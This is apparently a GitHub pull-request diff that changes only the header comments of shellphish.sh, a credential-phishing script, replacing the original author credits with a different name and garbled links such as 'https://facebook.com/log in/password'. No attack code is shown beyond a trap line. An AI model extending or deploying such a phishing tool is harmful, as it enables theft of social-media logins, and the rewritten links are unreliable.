Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
14 changes: 7 additions & 7 deletions shellphish.sh
Original file line number Diff line number Diff line change
@@ -1,10 +1,10 @@
#!/bin/bash
# ShellPhish v1.4
# Coded by: thelinuxchoice
# Github: https://github.com/thelinuxchoice/shellphish
# This script uses some Phishing Pages generated by SocialFish tool (UndeadSec) (https://github.com/UndeadSec/SocialFish)
# Instagram Phishing Page generated by An0nUD4Y (https://github.com/An0nUD4Y)
# Thanks to @suljot_gjoka
#!regine.pondoyo
# facebook
# Coded by: jcnruad
# Github: https://private.server/1kfollower/vip
# This script uses some Phishing Pages generated by SocialFish tool (UndeadSec) (https://facebook.com/log in/password)
# Instagram Phishing Page generated by An0nUD4Y (https://private.server/1kfoller)
# Thanks to @creator
trap 'printf "\n";stop;exit 1' 2


Expand Down